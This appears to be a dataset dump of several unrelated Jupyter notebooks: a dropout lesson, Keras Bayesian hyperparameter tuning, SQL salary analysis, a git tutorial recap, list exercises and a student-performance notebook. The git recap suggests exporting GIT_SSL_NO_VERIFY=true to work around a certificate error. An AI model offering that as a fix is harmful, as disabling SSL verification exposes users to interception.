"**Note**:\n- A **common mistake** when using dropout is to use it both in training and testing. You should use dropout (randomly eliminate nodes) only in training. \n- Deep learning frameworks like [tensorflow](https://www.tensorflow.org/api_docs/python/tf/nn/dropout), [PaddlePaddle](http://doc.paddlepaddle.org/release_doc/0.9.0/doc/ui/api/trainer_config_helpers/attrs.html), [keras](https://keras.io/layers/core/#dropout) or [caffe](http://caffe.berkeleyvision.org/tutorial/layers/dropout.html) come with a dropout layer implementation. Don't stress - you will soon learn some of these frameworks.\n\n<font color='blue'>\n**What you should remember about dropout:**\n- Dropout is a regularization technique.\n- You only use dropout during training. Don't use dropout (randomly eliminate nodes) during test time.\n- Apply dropout both during forward and backward propagation.\n- During training time, divide each dropout layer by keep_prob to keep the same expected value for the activations. For example, if keep_prob is 0.5, then we will on average shut down half the nodes, so the output will be scaled by 0.5 since only the remaining half are contributing to the solution. Dividing by 0.5 is equivalent to multiplying by 2. Hence, the output now has the same expected value. You can check that this works even when keep_prob is other values than 0.5. ",
"_____no_output_____"
],
[
"## 4 - Conclusions",
"_____no_output_____"
],
[
"**Here are the results of our three models**: \n\n<table> \n <tr>\n <td>\n **model**\n </td>\n <td>\n **train accuracy**\n </td>\n <td>\n **test accuracy**\n </td>\n\n </tr>\n <td>\n 3-layer NN without regularization\n </td>\n <td>\n 95%\n </td>\n <td>\n 91.5%\n </td>\n <tr>\n <td>\n 3-layer NN with L2-regularization\n </td>\n <td>\n 94%\n </td>\n <td>\n 93%\n </td>\n </tr>\n <tr>\n <td>\n 3-layer NN with dropout\n </td>\n <td>\n 93%\n </td>\n <td>\n 95%\n </td>\n </tr>\n</table> ",
"_____no_output_____"
],
[
"Note that regularization hurts training set performance! This is because it limits the ability of the network to overfit to the training set. But since it ultimately gives better test accuracy, it is helping your system. ",
"_____no_output_____"
],
[
"Congratulations for finishing this assignment! And also for revolutionizing French football. :-) ",
"_____no_output_____"
],
[
"<font color='blue'>\n**What we want you to remember from this notebook**:\n- Regularization will help you reduce overfitting.\n- Regularization will drive your weights to lower values.\n- L2 regularization and Dropout are two very effective regularization techniques.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb2c429e51648f8b51e6286e0a9e9cf8909f3412 | 14,029 | ipynb | Jupyter Notebook | t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb | RamsteinWR/t81_558_deep_learning | f13a6e795a034272a107347066ff5e04161aa478 | [
"Apache-2.0"
] | 1 | 2020-01-03T21:41:58.000Z | 2020-01-03T21:41:58.000Z | t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb | RamsteinWR/t81_558_deep_learning | f13a6e795a034272a107347066ff5e04161aa478 | [
"Apache-2.0"
] | null | null | null | t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb | RamsteinWR/t81_558_deep_learning | f13a6e795a034272a107347066ff5e04161aa478 | [
"Apache-2.0"
] | null | null | null | 37.61126 | 273 | 0.574595 | [
[
[
"<a href=\"https://colab.research.google.com/github/jeffheaton/t81_558_deep_learning/blob/master/t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# T81-558: Applications of Deep Neural Networks\n**Module 8: Kaggle Data Sets**\n* Instructor: [Jeff Heaton](https://sites.wustl.edu/jeffheaton/), McKelvey School of Engineering, [Washington University in St. Louis](https://engineering.wustl.edu/Programs/Pages/default.aspx)\n* For more information visit the [class website](https://sites.wustl.edu/jeffheaton/t81-558/).",
"_____no_output_____"
],
[
"# Module 8 Material\n\n* Part 8.1: Introduction to Kaggle [[Video]](https://www.youtube.com/watch?v=v4lJBhdCuCU&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_1_kaggle_intro.ipynb)\n* Part 8.2: Building Ensembles with Scikit-Learn and Keras [[Video]](https://www.youtube.com/watch?v=LQ-9ZRBLasw&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_2_keras_ensembles.ipynb)\n* Part 8.3: How Should you Architect Your Keras Neural Network: Hyperparameters [[Video]](https://www.youtube.com/watch?v=1q9klwSoUQw&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_3_keras_hyperparameters.ipynb)\n* **Part 8.4: Bayesian Hyperparameter Optimization for Keras** [[Video]](https://www.youtube.com/watch?v=sXdxyUCCm8s&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb)\n* Part 8.5: Current Semester's Kaggle [[Video]](https://www.youtube.com/watch?v=48OrNYYey5E) [[Notebook]](t81_558_class_08_5_kaggle_project.ipynb)\n",
"_____no_output_____"
],
[
"# Google CoLab Instructions\n\nThe following code ensures that Google CoLab is running the correct version of TensorFlow.",
"_____no_output_____"
]
],
[
[
"# Startup Google CoLab\ntry:\n %tensorflow_version 2.x\n COLAB = True\n print(\"Note: using Google CoLab\")\nexcept:\n print(\"Note: not using Google CoLab\")\n COLAB = False\n\n# Nicely formatted time string\ndef hms_string(sec_elapsed):\n h = int(sec_elapsed / (60 * 60))\n m = int((sec_elapsed % (60 * 60)) / 60)\n s = sec_elapsed % 60\n return \"{}:{:>02}:{:>05.2f}\".format(h, m, s)",
"Note: not using Google CoLab\n"
]
],
[
[
"# Part 8.4: Bayesian Hyperparameter Optimization for Keras\n\nSnoek, J., Larochelle, H., & Adams, R. P. (2012). [Practical bayesian optimization of machine learning algorithms](https://arxiv.org/pdf/1206.2944.pdf). In *Advances in neural information processing systems* (pp. 2951-2959).\n\n\n* [bayesian-optimization](https://github.com/fmfn/BayesianOptimization)\n* [hyperopt](https://github.com/hyperopt/hyperopt)\n* [spearmint](https://github.com/JasperSnoek/spearmint)",
"_____no_output_____"
]
],
[
[
"# Ignore useless W0819 warnings generated by TensorFlow 2.0. Hopefully can remove this ignore in the future.\n# See https://github.com/tensorflow/tensorflow/issues/31308\nimport logging, os\nlogging.disable(logging.WARNING)\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\nimport pandas as pd\nfrom scipy.stats import zscore\n\n# Read the data set\ndf = pd.read_csv(\n \"https://data.heatonresearch.com/data/t81-558/jh-simple-dataset.csv\",\n na_values=['NA','?'])\n\n# Generate dummies for job\ndf = pd.concat([df,pd.get_dummies(df['job'],prefix=\"job\")],axis=1)\ndf.drop('job', axis=1, inplace=True)\n\n# Generate dummies for area\ndf = pd.concat([df,pd.get_dummies(df['area'],prefix=\"area\")],axis=1)\ndf.drop('area', axis=1, inplace=True)\n\n# Missing values for income\nmed = df['income'].median()\ndf['income'] = df['income'].fillna(med)\n\n# Standardize ranges\ndf['income'] = zscore(df['income'])\ndf['aspect'] = zscore(df['aspect'])\ndf['save_rate'] = zscore(df['save_rate'])\ndf['age'] = zscore(df['age'])\ndf['subscriptions'] = zscore(df['subscriptions'])\n\n# Convert to numpy - Classification\nx_columns = df.columns.drop('product').drop('id')\nx = df[x_columns].values\ndummies = pd.get_dummies(df['product']) # Classification\nproducts = dummies.columns\ny = dummies.values",
"_____no_output_____"
],
[
"import pandas as pd\nimport os\nimport numpy as np\nimport time\nimport tensorflow.keras.initializers\nimport statistics\nimport tensorflow.keras\nfrom sklearn import metrics\nfrom sklearn.model_selection import StratifiedKFold\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation, Dropout, InputLayer\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom tensorflow.keras.layers import LeakyReLU,PReLU\nfrom tensorflow.keras.optimizers import Adam\n\ndef generate_model(dropout, neuronPct, neuronShrink):\n # We start with some percent of 5000 starting neurons on the first hidden layer.\n neuronCount = int(neuronPct * 5000)\n \n # Construct neural network\n # kernel_initializer = tensorflow.keras.initializers.he_uniform(seed=None)\n model = Sequential()\n\n # So long as there would have been at least 25 neurons and fewer than 10\n # layers, create a new layer.\n layer = 0\n while neuronCount>25 and layer<10:\n # The first (0th) layer needs an input input_dim(neuronCount)\n if layer==0:\n model.add(Dense(neuronCount, \n input_dim=x.shape[1], \n activation=PReLU()))\n else:\n model.add(Dense(neuronCount, activation=PReLU())) \n layer += 1\n\n # Add dropout after each hidden layer\n model.add(Dropout(dropout))\n\n # Shrink neuron count for each layer\n neuronCount = neuronCount * neuronShrink\n\n model.add(Dense(y.shape[1],activation='softmax')) # Output\n return model",
"_____no_output_____"
],
[
"# Generate a model and see what the resulting structure looks like.\nmodel = generate_model(dropout=0.2, neuronPct=0.1, neuronShrink=0.25)\nmodel.summary()",
"Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\ndense (Dense) (None, 500) 24500 \n_________________________________________________________________\ndropout (Dropout) (None, 500) 0 \n_________________________________________________________________\ndense_1 (Dense) (None, 125) 62750 \n_________________________________________________________________\ndropout_1 (Dropout) (None, 125) 0 \n_________________________________________________________________\ndense_2 (Dense) (None, 31) 3937 \n_________________________________________________________________\ndropout_2 (Dropout) (None, 31) 0 \n_________________________________________________________________\ndense_3 (Dense) (None, 7) 224 \n=================================================================\nTotal params: 91,411\nTrainable params: 91,411\nNon-trainable params: 0\n_________________________________________________________________\n"
],
[
"def evaluate_network(dropout,lr,neuronPct,neuronShrink):\n SPLITS = 2\n\n # Bootstrap\n boot = StratifiedShuffleSplit(n_splits=SPLITS, test_size=0.1)\n\n # Track progress\n mean_benchmark = []\n epochs_needed = []\n num = 0\n \n\n # Loop through samples\n for train, test in boot.split(x,df['product']):\n start_time = time.time()\n num+=1\n\n # Split train and test\n x_train = x[train]\n y_train = y[train]\n x_test = x[test]\n y_test = y[test]\n\n model = generate_model(dropout, neuronPct, neuronShrink)\n model.compile(loss='categorical_crossentropy', optimizer=Adam(lr=lr))\n monitor = EarlyStopping(monitor='val_loss', min_delta=1e-3, \n patience=100, verbose=0, mode='auto', restore_best_weights=True)\n\n # Train on the bootstrap sample\n model.fit(x_train,y_train,validation_data=(x_test,y_test),callbacks=[monitor],verbose=0,epochs=1000)\n epochs = monitor.stopped_epoch\n epochs_needed.append(epochs)\n\n # Predict on the out of boot (validation)\n pred = model.predict(x_test)\n\n # Measure this bootstrap's log loss\n y_compare = np.argmax(y_test,axis=1) # For log loss calculation\n score = metrics.log_loss(y_compare, pred)\n mean_benchmark.append(score)\n m1 = statistics.mean(mean_benchmark)\n m2 = statistics.mean(epochs_needed)\n mdev = statistics.pstdev(mean_benchmark)\n\n # Record this iteration\n time_took = time.time() - start_time\n #print(f\"#{num}: score={score:.6f}, mean score={m1:.6f}, stdev={mdev:.6f}, epochs={epochs}, mean epochs={int(m2)}, time={hms_string(time_took)}\")\n\n tensorflow.keras.backend.clear_session()\n return (-m1)\n\nprint(evaluate_network(\n dropout=0.2,\n lr=1e-3,\n neuronPct=0.2,\n neuronShrink=0.2))\n",
"-0.6845843913475982\n"
],
[
"from bayes_opt import BayesianOptimization\nimport time\n\n# Supress NaN warnings, see: https://stackoverflow.com/questions/34955158/what-might-be-the-cause-of-invalid-value-encountered-in-less-equal-in-numpy\nimport warnings\nwarnings.filterwarnings(\"ignore\",category =RuntimeWarning)\n\n# Bounded region of parameter space\npbounds = {'dropout': (0.0, 0.499),\n 'lr': (0.0, 0.1),\n 'neuronPct': (0.01, 1),\n 'neuronShrink': (0.01, 1)\n }\n\noptimizer = BayesianOptimization(\n f=evaluate_network,\n pbounds=pbounds,\n verbose=2, # verbose = 1 prints only when a maximum is observed, verbose = 0 is silent\n random_state=1,\n)\n\nstart_time = time.time()\noptimizer.maximize(init_points=10, n_iter=100,)\ntime_took = time.time() - start_time\n\nprint(f\"Total runtime: {hms_string(time_took)}\")\nprint(optimizer.max)",
"_____no_output_____"
]
],
[
[
"{'target': -0.6500334282952827, 'params': {'dropout': 0.12771198428037775, 'lr': 0.0074010841641111965, 'neuronPct': 0.10774655638231533, 'neuronShrink': 0.2784788676498257}}",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb2c48376c488dc99423b32e289850df809850cb | 7,901 | ipynb | Jupyter Notebook | content/notebooks/2015-12-11-meeting-summary.ipynb | ueapy/ueapy.github.io | 920f25f4189512a77aa6b79eae133db0f14e514a | [
"MIT"
] | 2 | 2016-02-02T06:15:38.000Z | 2016-11-28T10:31:43.000Z | content/notebooks/2015-12-11-meeting-summary.ipynb | ueapy/ueapy.github.io | 920f25f4189512a77aa6b79eae133db0f14e514a | [
"MIT"
] | null | null | null | content/notebooks/2015-12-11-meeting-summary.ipynb | ueapy/ueapy.github.io | 920f25f4189512a77aa6b79eae133db0f14e514a | [
"MIT"
] | 3 | 2016-01-22T11:27:08.000Z | 2018-02-09T16:20:57.000Z | 19.508642 | 234 | 0.529806 | [
[
[
"name = '2015-12-11-meeting-summary'\ntitle = 'Introducing Git'\ntags = 'git, github, version control'\nauthor = 'Denis Sergeev'",
"_____no_output_____"
],
[
"from nb_tools import connect_notebook_to_post\nfrom IPython.core.display import HTML\n\nhtml = connect_notebook_to_post(name, title, tags, author)",
"_____no_output_____"
]
],
[
[
"Today we talked about git and its functionality for managing code, text documents and other building blocks of our research.",
"_____no_output_____"
],
[
"We followed a very good tutorial created by [**Software Carpentry**](http://swcarpentry.github.io/git-novice/). There are hundreds of other resources available online, for example, [**Git Real**](http://gitreal.codeschool.com/).",
"_____no_output_____"
],
[
"Hence, this post is not trying to be yet another git tutorial. Instead, below is just a brief recap of what commands were covered during the meeting.",
"_____no_output_____"
],
[
"## Setting Up Git",
"_____no_output_____"
],
[
"Set up your name and email so that each time you contribute to a project your commit has an author",
"_____no_output_____"
],
[
"`git config --global user.name \"Python UEA\"`",
"_____no_output_____"
],
[
"`git config --global user.email \"[email protected]\"`",
"_____no_output_____"
],
[
"## Creating a Repository",
"_____no_output_____"
],
[
"Create a new directory for a project",
"_____no_output_____"
],
[
"`mkdir myproject`",
"_____no_output_____"
],
[
"Go into the newly created directory",
"_____no_output_____"
],
[
"`cd myproject`",
"_____no_output_____"
],
[
"Make the directory a Git repository",
"_____no_output_____"
],
[
"`git init`",
"_____no_output_____"
],
[
"Check status of the repository",
"_____no_output_____"
],
[
"`git status`",
"_____no_output_____"
],
[
"## Tracking Changes",
"_____no_output_____"
],
[
"Add a Python script to the repo (make the file staged for commit)",
"_____no_output_____"
],
[
"`git add awesome_script.py`",
"_____no_output_____"
],
[
"Commit changes with a meaningful message",
"_____no_output_____"
],
[
"`git commit -m \"Add awesome script written in Python\"`",
"_____no_output_____"
],
[
"## Exploring History",
"_____no_output_____"
],
[
"### Commits history",
"_____no_output_____"
],
[
"`git log`",
"_____no_output_____"
],
[
"### Comparing different versions of files",
"_____no_output_____"
],
[
"List all untracked changes in the repository",
"_____no_output_____"
],
[
"`git diff`",
"_____no_output_____"
],
[
"Differences with “head minus one”, i.e. previous, commit",
"_____no_output_____"
],
[
"`git diff HEAD~1 awesome_script.py`",
"_____no_output_____"
],
[
"Differences with a specific commit",
"_____no_output_____"
],
[
"`git diff <unique commit id> awesome_script.py`",
"_____no_output_____"
],
[
"## Ignoring Things",
"_____no_output_____"
],
[
"Create a .gitignore file and put '*.pyc' line in it telling git will to ignore all Python bytecode files",
"_____no_output_____"
],
[
"`echo '*.pyc' >> .gitignore`",
"_____no_output_____"
],
[
"Include .gitignore in the repository",
"_____no_output_____"
],
[
"`git add .gitignore`",
"_____no_output_____"
],
[
"`git commit -m \"Add .gitignore file\"`",
"_____no_output_____"
],
[
"`git status`",
"_____no_output_____"
],
[
"## Remotes in GitHub",
"_____no_output_____"
],
[
"`git remote add origin [email protected]:<username>/<repository_name>.git`",
"_____no_output_____"
],
[
"`git push -u origin master`",
"_____no_output_____"
],
[
"### Issue on Grace",
"_____no_output_____"
],
[
"If you use git on [Grace](http://rscs.uea.ac.uk/high-performance-computing) and have tried `git push` to a GitHub repository, you have probably encountered the following error:",
"_____no_output_____"
],
[
"`fatal: unable to access 'https://github.com/***/***/': error:0D0C50A1:asn1 encoding routines:ASN1_item_verify:unknown message digest algorithm`",
"_____no_output_____"
],
[
"One of the possible solutions here is to switch off SSL verification by adding the following line in your .bashrc file:",
"_____no_output_____"
],
[
"`export GIT_SSL_NO_VERIFY=true`",
"_____no_output_____"
]
],
[
[
"HTML(html)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
]
] |
cb2c4d82b1ad27a5059802798e689872e2eb0f4d | 9,584 | ipynb | Jupyter Notebook | Lists/Arrays_data_Structure.ipynb | pdx97/Python_Data_Structures_and_Algorithms_Implementations | 898af6dce4fb5882145b1c2ce3f2d19e36a27bce | [
"MIT"
] | 2 | 2021-05-10T10:32:55.000Z | 2021-05-11T10:18:11.000Z | Lists/Arrays_data_Structure.ipynb | pdx97/Python_Data_Structures_and_Algorithms_Implementations | 898af6dce4fb5882145b1c2ce3f2d19e36a27bce | [
"MIT"
] | null | null | null | Lists/Arrays_data_Structure.ipynb | pdx97/Python_Data_Structures_and_Algorithms_Implementations | 898af6dce4fb5882145b1c2ce3f2d19e36a27bce | [
"MIT"
] | null | null | null | 17.206463 | 88 | 0.444908 | [
[
[
"Expenses = {\"jan\":2200,\"feb\":2350,\"mar\":2600,\"Apr\":2130,\"May\":2190}",
"_____no_output_____"
],
[
"diff = Expenses[\"feb\"] - Expenses[\"jan\"]",
"_____no_output_____"
],
[
"diff\n",
"_____no_output_____"
],
[
"Values = Expenses.values()\nList_Values = list(Values)",
"_____no_output_____"
],
[
"List_Values",
"_____no_output_____"
],
[
"sum = 0\nfor i in range(3):\n sum = sum + List_Values[i]\n \nprint(sum)\n ",
"7150\n"
],
[
"for i in Expenses.values():\n if(Expenses.values()==2000):\n print(\"Yes\")\n else:\n print(\"No\")",
"No\nNo\nNo\nNo\nNo\n"
],
[
"Expenses['June'] = 1980 # adding new key value to the dictionary",
"_____no_output_____"
],
[
"Expenses",
"_____no_output_____"
],
[
"Refund = Expenses['Apr'] - 200",
"_____no_output_____"
],
[
"Refund ",
"_____no_output_____"
],
[
"Expenses['Apr'] = Refund ",
"_____no_output_____"
],
[
"Expenses['Apr']\n",
"_____no_output_____"
],
[
"Expenses",
"_____no_output_____"
],
[
"heros=['spider man','thor','hulk','iron man','captain america']",
"_____no_output_____"
],
[
"len(heros) # lenght of the list",
"_____no_output_____"
],
[
"heros.append('black panther')",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"heros.insert(3,'black panther')",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"heros.pop(3)",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"heros.insert(1,'iron man')",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"del heros[1:3]",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"heros.pop(1)",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"heros.insert(1,'doctor strange')",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"sorted_heros = sorted(heros)",
"_____no_output_____"
],
[
"sorted_heros",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2c64c94cbaec40ca62c5b091e4af5b6de6dad4 | 43,033 | ipynb | Jupyter Notebook | EmployeeSQL/SqlChallene.ipynb | thenry390/sql-challenge | 6fc1159c39936594265b01f462812f32cb8488af | [
"ADSL"
] | null | null | null | EmployeeSQL/SqlChallene.ipynb | thenry390/sql-challenge | 6fc1159c39936594265b01f462812f32cb8488af | [
"ADSL"
] | null | null | null | EmployeeSQL/SqlChallene.ipynb | thenry390/sql-challenge | 6fc1159c39936594265b01f462812f32cb8488af | [
"ADSL"
] | null | null | null | 91.559574 | 21,640 | 0.811563 | [
[
[
"# Observations\n1. It appears the salaries are very high on the high end and very low at the low end.\n2. Mimics the business model of a franchise restaurant where most of the lower end employees make minimum wage.",
"_____no_output_____"
]
],
[
[
"from sqlalchemy import create_engine, Table, Column, MetaData, Integer, Computed\nfrom random import randint\nimport os\nfrom dotenv import load_dotenv\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import colors\nfrom matplotlib.ticker import PercentFormatter\nimport scipy.stats as sts\n\n# dialect+driver = 'postgres' for us, host probably = 'localhost' (for now), username defaults to 'postgres'",
"_____no_output_____"
],
[
"load_dotenv()\nusername=os.environ.get('DB_USERNAME')\npassword=os.environ.get('DB_PASSWORD')\n\nconnection_string= f'postgresql+psycopg2://{username}:{password}@localhost:5432/EmployeeDB'",
"_____no_output_____"
],
[
"def doQuery(query): # READ\n return connection.execute(query).fetchall()\ndef doUpdate(updateQuery): # CREATE, UPDATE, DELETE\n connection.execute(updateQuery)",
"_____no_output_____"
],
[
"connection = create_engine(connection_string).connect()\n\nquery = \"select e.emp_no, e.emp_title_id, e.birthdate, e.first_name, e.last_name, e.sex, e.hire_date, t.title, s.salary \\\nfrom employee e, salary s, title t \\\nwhere e.emp_no = s.emp_no and \\\ne.emp_title_id = t.title_id\"\n\nqueryResults = doQuery(query)\nqueryResults_df = pd.DataFrame(queryResults)\n\nconnection.close()\nqueryResults_df = queryResults_df.rename(columns={0:'Emp Number', 1:'Title ID', 2:'Birth Date',3:'First Name',4:'Last Name',5:'Gender',6:'Hire Date',7:'Title',8:'Salary'})\nqueryResults_df.head()",
"_____no_output_____"
]
],
[
[
"Create a histogram to visualize the most common salary ranges for employees.",
"_____no_output_____"
]
],
[
[
"salary=queryResults_df[\"Salary\"]\nplt.hist(salary)\nplt.show()\nplt.savefig(\"./Data Analysis/Images/SalaryHistogram.png\")\nprint(sts.normaltest(salary.sample(50)))",
"_____no_output_____"
],
[
"# Demonstrate calculating measures of central tendency\nmean_numpy = np.mean(salary)\nprint(f\"The mean salary is {mean_numpy}\")\n\nmedian_numpy = np.median(salary)\nprint(f\"The median salary is {median_numpy}\")\n\nmode_scipy = sts.mode(salary)\nprint(f\"The mode salary is {mode_scipy}\")",
"_____no_output_____"
]
],
[
[
"Create a bar chart of average salary by title.",
"_____no_output_____"
]
],
[
[
"connection = create_engine(connection_string).connect()\n\nquery = \"select round(avg(s.salary)), t.title \\\nfrom employee e, salary s, title t \\\nwhere s.emp_no = e.emp_no and \\\ne.emp_title_id = t.title_id \\\ngroup by t.title\"\n\nqueryResults2 = doQuery(query)\nqueryResults2_df = pd.DataFrame(queryResults2)\n\nconnection.close()\nqueryResults2_df = queryResults2_df.rename(columns={0:'Average Salary', 1:'Title'})\nqueryResults2_df",
"_____no_output_____"
],
[
"# Create a bar chart based upon the above data\n\naverage_salary=queryResults2_df['Average Salary']\nx_axis = np.arange(len(average_salary))\nplt.bar(x_axis, average_salary, color=\"b\", align=\"center\")\n# Create the ticks for our bar chart's x axis\ntick_locations = [value for value in x_axis]\nplt.xticks(tick_locations, queryResults2_df['Title'], rotation=45)\n# Create the ticks for our bar chart's x axis\ntick_locations = [value for value in x_axis]\nplt.xticks(tick_locations, queryResults2_df['Title'], rotation=45)\n# Set the limits of the x axis\nplt.xlim(-0.75, len(x_axis)-0.25)\nplt.ylim(0, max(average_salary)+10000)\n# Give the chart a title, x label, and y label\nplt.title(\"Average Salary by Title\")\nplt.xlabel(\"Titles\")\nplt.ylabel(\"Average Salary\")\nplt.savefig(\"./Data Analysis/Images/AverageSalaryByTitle.png\")\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2c7372d96d73cfce3274df59bfc8025861ec88 | 419,408 | ipynb | Jupyter Notebook | Avaliar_o_desempenho_de_um_aluno_usando_técnicas_de_Machine_Learning_e_python.ipynb | MarceloClaro/python-business | 7027e358cbb762cb86ed7fa6e1590d6d6155e1ad | [
"CC-BY-4.0"
] | null | null | null | Avaliar_o_desempenho_de_um_aluno_usando_técnicas_de_Machine_Learning_e_python.ipynb | MarceloClaro/python-business | 7027e358cbb762cb86ed7fa6e1590d6d6155e1ad | [
"CC-BY-4.0"
] | null | null | null | Avaliar_o_desempenho_de_um_aluno_usando_técnicas_de_Machine_Learning_e_python.ipynb | MarceloClaro/python-business | 7027e358cbb762cb86ed7fa6e1590d6d6155e1ad | [
"CC-BY-4.0"
] | null | null | null | 310.902891 | 67,474 | 0.896464 | [
[
[
"<a href=\"https://colab.research.google.com/github/MarceloClaro/python-business/blob/gh-pages/Avaliar_o_desempenho_de_um_aluno_usando_t%C3%A9cnicas_de_Machine_Learning_e_python.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# **AVALIAÇÃO DO DESEMPENHO DE ALUNOS**\r\n\r\n# Instalções de Bibliotecas em Python.",
"_____no_output_____"
]
],
[
[
"# Bibliotecas para algumas operações básicas\r\nimport numpy as np\r\nimport pandas as pd",
"_____no_output_____"
]
],
[
[
"### Biblioteca dabl tem que ser instalado no Colab",
"_____no_output_____"
]
],
[
[
"pip install git+https://github.com/amueller/dabl/",
"Collecting git+https://github.com/amueller/dabl/\n Cloning https://github.com/amueller/dabl/ to /tmp/pip-req-build-m74cqrt1\n Running command git clone -q https://github.com/amueller/dabl/ /tmp/pip-req-build-m74cqrt1\nRequirement already satisfied (use --upgrade to upgrade): dabl==0.1.8 from git+https://github.com/amueller/dabl/ in /usr/local/lib/python3.6/dist-packages\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (1.19.4)\nRequirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (1.4.1)\nRequirement already satisfied: scikit-learn in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (0.22.2.post1)\nRequirement already satisfied: pandas in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (1.1.5)\nRequirement already satisfied: matplotlib in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (3.2.2)\nRequirement already satisfied: seaborn in /usr/local/lib/python3.6/dist-packages (from dabl==0.1.8) (0.11.0)\nRequirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn->dabl==0.1.8) (1.0.0)\nRequirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas->dabl==0.1.8) (2.8.1)\nRequirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas->dabl==0.1.8) (2018.9)\nRequirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib->dabl==0.1.8) (0.10.0)\nRequirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib->dabl==0.1.8) (2.4.7)\nRequirement already satisfied: kiwisolver>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib->dabl==0.1.8) (1.3.1)\nRequirement already satisfied: six>=1.5 in /usr/local/lib/python3.6/dist-packages (from python-dateutil>=2.7.3->pandas->dabl==0.1.8) (1.15.0)\nBuilding wheels for collected packages: dabl\n Building wheel for dabl (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for dabl: filename=dabl-0.1.8-cp36-none-any.whl size=569084 sha256=6ed9d5c162cc47cfb92791e774ef64d37d56b61e9e90bbb47d1650d8490a6780\n Stored in directory: /tmp/pip-ephem-wheel-cache-b_55f0a5/wheels/a8/9f/dd/0db433c80ea11cc41e7fea0fd2e9b1b240068e64d6dce0c706\nSuccessfully built dabl\n"
],
